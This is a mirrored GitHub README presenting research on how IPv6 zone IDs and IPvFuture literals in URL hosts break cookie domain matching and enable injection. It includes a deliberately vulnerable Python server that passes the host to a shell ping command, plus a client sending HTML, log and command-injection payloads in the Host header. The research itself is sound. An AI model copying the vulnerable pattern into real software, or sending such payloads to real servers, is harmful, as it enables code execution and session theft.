https://github.com/mauricelambert/urlipliteralsecurity

Research about few security problems and bugs caused by the host element for modern URI.
https://github.com/mauricelambert/urlipliteralsecurity
bugs cybersecurity exploit research rfc uri
Last synced: 5 months ago
JSON representation
Research about few security problems and bugs caused by the host element for modern URI.
Host: GitHub
URL: https://github.com/mauricelambert/urlipliteralsecurity
Owner: mauricelambert
License: gpl-3.0
Created: 2025-03-01T15:00:01.000Z (over 1 year ago)
Default Branch: main
Last Pushed: 2025-05-05T07:48:34.000Z (about 1 year ago)
Last Synced: 2025-05-31T08:33:09.293Z (about 1 year ago)
Topics: bugs, cybersecurity, exploit, research, rfc, uri
Homepage:
Size: 36.1 KB
Stars: 0
Watchers: 1
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project

README

          # URL Host - Dangerous field

## Summary

1. The [RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax](https://www.ietf.org/rfc/rfc3986.txt) define the generic URI syntax, with the host field and several formats and dangerous characters.

2. The [RFC 6874 - Representing IPv6 Zone Identifiers in Address Literals and Uniform Resource Identifiers](https://www.ietf.org/rfc/rfc6874.txt) add the support for [RFC 4007 - IPv6 Scoped Address Architecture](https://www.ietf.org/rfc/rfc4007.txt) in URI.

I think these RFCs can cause security issues and bugs because the `host` field contains several formats, many of which accept dangerous characters:

 - `IPvFuture` where `sub-delims` can be used and some implementations does not comply with the RFC 3986 and accept multiples other characters.

 - `ZoneID` can contains many characters and some implementations does not comply with the RFC 6874 (comply only with RFC 4007).

## Context

### IPvFuture

In anticipation of future the [RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax](https://www.ietf.org/rfc/rfc3986.txt) define the `IPvFuture` format:

```

 unreserved    = ALPHA / DIGIT / "-" / "." / "_" / "~"

 sub-delims    = "!" / "$" / "&" / "'" / "(" / ")"

                 / "*" / "+" / "," / ";" / "="

 IPvFuture  = "v" 1*HEXDIG "." 1*( unreserved / sub-delims / ":" )

```

This format doesn't contain a character that allows parsing ambiguities but it contain many special characters.

### IPv6

The [RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax](https://www.ietf.org/rfc/rfc3986.txt) use [RFC 3513 - Internet Protocol Version 6 (IPv6) Addressing Architecture](https://www.ietf.org/rfc/rfc3513.txt) to define the IPv6 as following:

```

 IPv6address =                            6( h16 ":" ) ls32

                  /                       "::" 5( h16 ":" ) ls32

                  / [               h16 ] "::" 4( h16 ":" ) ls32

                  / [ *1( h16 ":" ) h16 ] "::" 3( h16 ":" ) ls32

                  / [ *2( h16 ":" ) h16 ] "::" 2( h16 ":" ) ls32

                  / [ *3( h16 ":" ) h16 ] "::"    h16 ":"   ls32

                  / [ *4( h16 ":" ) h16 ] "::"              ls32

                  / [ *5( h16 ":" ) h16 ] "::"              h16

                  / [ *6( h16 ":" ) h16 ] "::"

      ls32        = ( h16 ":" h16 ) / IPv4address

                  ; least-significant 32 bits of address

      h16         = 1*4HEXDIG

                  ; 16 bits of address represented in hexadecimal

```

The RFC 4007 define the support for a `ZoneID` concatened to IPv6 address format and the RFC 6874 update the RFC 3986 to support the `ZoneID` definition as following format:

```

pct-encoded   = "%" HEXDIG HEXDIG

unreserved    = ALPHA / DIGIT / "-" / "." / "_" / "~"

ZoneID = 1*( unreserved / pct-encoded )

IPv6addrz = IPv6address "%25" ZoneID

```

This format doesn't contain many special characters, it doesn't contain a character that allows parsing ambiguities, but it does contain all the characters that allow you to write an fqdn.

## Problems

1. The first source of the problems is not specific to URLs: the knowledge of the developers, the developers know neither these formats nor the dangers of using the host field.

2. Some implementations does not comply with the RFCs:

     - The `IPvFuture` format is not really know and used, some implementations doesn't comply with RFC to reduce code size or through ignorance.

     - In URL the IPv6 and `ZoneID` are sometime parsed with a IPv6 parser (comply with RFC 4007 where `ZoneID` format is defined as: `An implementation MAY support other kinds of non-null strings as .`). The RFC 6874 doesn't allow all non-null string characters for security reason and to avoid ambiguities in parsing.

3. The `host` element URI is an important element and is used for many usages:

     - Define where web cookie or credentials should be sent

     - `Host` header in HTTP

     - *hostname* to identify server by reverse-proxy or in logs

     - Maybe in some web page

     - In unsecure code evaluated

## POC and simplified examples

### Send a cookie

```python

from urllib.parse import urlparse

from fnmatch import fnmatch

from typing import Tuple

def get_hostname_and_path(url: str) -> Tuple[str, str]:

    """

    This function returns hostname and path from an URL.

    """

    parsed_url = urlparse(url)

    hostname = parsed_url.hostname

    path = parsed_url.path

    return hostname, path

def domain_match(cookie_domain: str, cookie_path: str, url: str) -> bool:

    """

    This function checks for a cookie if you should add it to a request for an URL.

    """

    hostname, path = get_hostname_and_path(url)

    if hostname.endswith(cookie_domain) and path.startswith(cookie_path):

        return True

    return False

cookie_domain = "example.com"

cookie_path = "/"

for url in ("http://example.com/", "http://google.com/", "http://[::1%example.com]/"):

    print(url, domain_match(cookie_domain, cookie_path, url))

```

This weak example is vulnerable and produce the following output:

```

http://example.com/ True

http://google.com/ False

http://[::1%example.com]/ True

```

#### Exploitation

The [RFC 6265 - HTTP State Management Mechanism](https://www.rfc-editor.org/rfc/rfc6265) how cookie domain should match the URI host:

```

5.1.3.  Domain Matching

   A string domain-matches a given domain string if at least one of the

   following conditions hold:

   o  The domain string and the string are identical.  (Note that both

      the domain string and the string will have been canonicalized to

      lower case at this point.)

   o  All of the following conditions hold:

      *  The domain string is a suffix of the string.

      *  The last character of the string that is not included in the

         domain string is a %x2E (".") character.

      *  The string is a host name (i.e., not an IP address).

```

1. When the *Host* field is an IP address there is no domain matching, the cookie should not be sent... But clients and servers need to works with IP address, so most of them implement the domain matching on IP address.

2. Domain matching do not consider the port, in python using `urllib.parse.urlparse` the `neloc` contain the port but the `hostname` does not contain the port. Many developpers use it for domain matching, the problem is: the IPv6 `ZoneID` and the `IPvFuture` is no longer identifiable because the `hostname` does not contains brackets (`[` and `]`, it's possible to detect IPv6 with colon: `:`, it's probably not implemented and `IPvFuture` can't be checked).

```python

>>> from urllib.parse import urlparse

>>> urlparse("http://test:80/")

ParseResult(scheme='http', netloc='test:80', path='/', params='', query='', fragment='')

>>> urlparse("http://test:80/").hostname

'test'

>>> urlparse("http://[v45.example.com]:80/").hostname

'v45.example.com'

>>> 

```

##### Implementations

Now check if we can exploit in few implementations:

1. Python and the standard library is **not vulnerable**: Keep square brackets `[]` (use `netloc`) to validate the host ([code](https://github.com/python/cpython/blob/ddc27f9c385f57db1c227b655ec84dcf097a8976/Lib/http/cookiejar.py#L619)):

```python

cut_port_re = re.compile(r":\d+$", re.ASCII)

def request_host(request):

    """Return request-host, as defined by RFC 2965.

    Variation from RFC: returned value is lowercased, for convenient

    comparison.

    """

    url = request.get_full_url()

    host = urllib.parse.urlparse(url)[1]

    if host == "":

        host = request.get_header("Host", "")

    # remove port, if present

    host = cut_port_re.sub("", host, 1)

    return host.lower()

```

2. Go and standard library is **not vulnerable**: check for `:` or `%` in the Host ([code](https://cs.opensource.google/go/go/+/refs/tags/go1.24.0:src/net/http/client.go;l=1020;drc=6b605505047416bbbf513bba1540220a8897f3f6)):

```go

func isDomainOrSubdomain(sub, parent string) bool {

    if sub == parent {

        return true

    }

    // If sub contains a :, it's probably an IPv6 address (and is definitely not a hostname).

    // Don't check the suffix in this case, to avoid matching the contents of a IPv6 zone.

    // For example, "::1%.www.example.com" is not a subdomain of "www.example.com".

    if strings.ContainsAny(sub, ":%") {

        return false

    }

    // If sub is "foo.example.com" and parent is "example.com",

    // that means sub must end in "."+parent.

    // Do it without allocating.

    if !strings.HasSuffix(sub, parent) {

        return false

    }

    return sub[len(sub)-len(parent)-1] == '.'

}

```

3. python-requests use urllib3 and is **not vulnerable**: ZoneID is not really supported (when you perform request with ZoneID it try to resolve as a hostame)

4. Ruby is **not vulnerable**: ZoneID is not supported

### Injection

There is too many HTTP servers so i don't check for all implementations, module, plugins, web-app... But there is probably multiples vulnerables running servers.

I write a minimal server and HTTP client for the demonstration:

#### Server

```python

from typing import Dict, Tuple, List, Callable, Iterable, Union

from wsgiref.simple_server import make_server, WSGIServer

from io import TextIOWrapper, BufferedReader

from wsgiref.util import FileWrapper

from urllib.parse import urlparse

from socket import AF_INET6

from logging import warning

from os import system

template = """

    

    

    

    
Welcome on {} !


"""

class WSGIServerIPv6(WSGIServer):

    address_family = AF_INET6

def get_full_url(environ) -> str:

    """

    This function returns the full URL for a WSGI server.

    """

    scheme = environ.get('wsgi.url_scheme', 'http')

    host = environ.get('HTTP_HOST', environ.get('SERVER_NAME'))

    path = environ.get('PATH_INFO', '')

    query = environ.get('QUERY_STRING', '')

    full_url = f"{scheme}://{host}{path}"

    if query:

        full_url += f"?{query}"

    return full_url

def application(environ: Dict[str, Union[str, bool, BufferedReader, TextIOWrapper, FileWrapper, Tuple[int, int]]], start_response: Callable[str, List[Tuple[str, str]]]) -> Iterable[bytes]:

    """

    This function implements a minimal WSGI server for the POC.

    """

    hostname = urlparse(get_full_url(environ)).hostname

    response = template.format(hostname)

    warning("Request for " + hostname)

    system(f'ping "{hostname}"')

    status = '200 OK'

    headers = [('Content-type', 'text/html')]

    start_response(status, headers)

    return [response.encode('utf-8')]

if __name__ == '__main__':

    with make_server('::1', 8000, application, WSGIServerIPv6) as httpd:

        print("Serving on port 8000...")

        httpd.serve_forever()

```

#### Client

```python

import socket

for payload in (

    "HTML injection",

    "log injection: malicious log !",

    "code injection\" | echo \"Malicious payload"

):

    s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)

    s.connect(("::1", 8000))

    request = f"GET / HTTP/1.1\r\nHost: [::1%{payload}]\r\n\r\n".encode()

    s.sendall(request)

    response = True

    while response:

        response = s.recv(4096)

        print(response.decode().strip())

    s.close()

```

#### Demonstrations

##### Server output

```

::1 - - [01/Mar/2025 14:25:32] "GET / HTTP/1.1" 200 252

WARNING:root:Request for ::1%HTML injection

Ping request could not find host ::1%HTML injection. Please check the name and try again.

::1 - - [01/Mar/2025 14:26:29] "GET / HTTP/1.1" 200 249

WARNING:root:Request for ::1%log injection: malicious log !

Ping request could not find host ::1%log injection: malicious log !. Please check the name and try again.

::1 - - [01/Mar/2025 14:26:29] "GET / HTTP/1.1" 200 241

WARNING:root:Request for ::1%code injection" | echo "Malicious payload

"Malicious payload"

::1 - - [01/Mar/2025 14:26:29] "GET / HTTP/1.1" 200 252

```

We have three vulnerabilities exploited: 

1. XSS (steal user or administrator sessions)

2. Log injection (hide malicious events, RCE with PHP or templating system, ...)

3. Code injection (execute malicious code, in my demonstration it's a system command but similar vulnerabilities can use any other syntax: PHP, SQL, Javascript, Python, ...)

## Conclusion

 - **Don't trust any field including valid and parsed host or IP**

 - If you are a developper speak about these problems with your colleagues

 - If you are `DevSecOps` consider the *host* as an user input (even if you use a secure parser)
ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/mauricelambert/urlipliteralsecurity

Awesome Lists containing this project

README

Welcome on {} !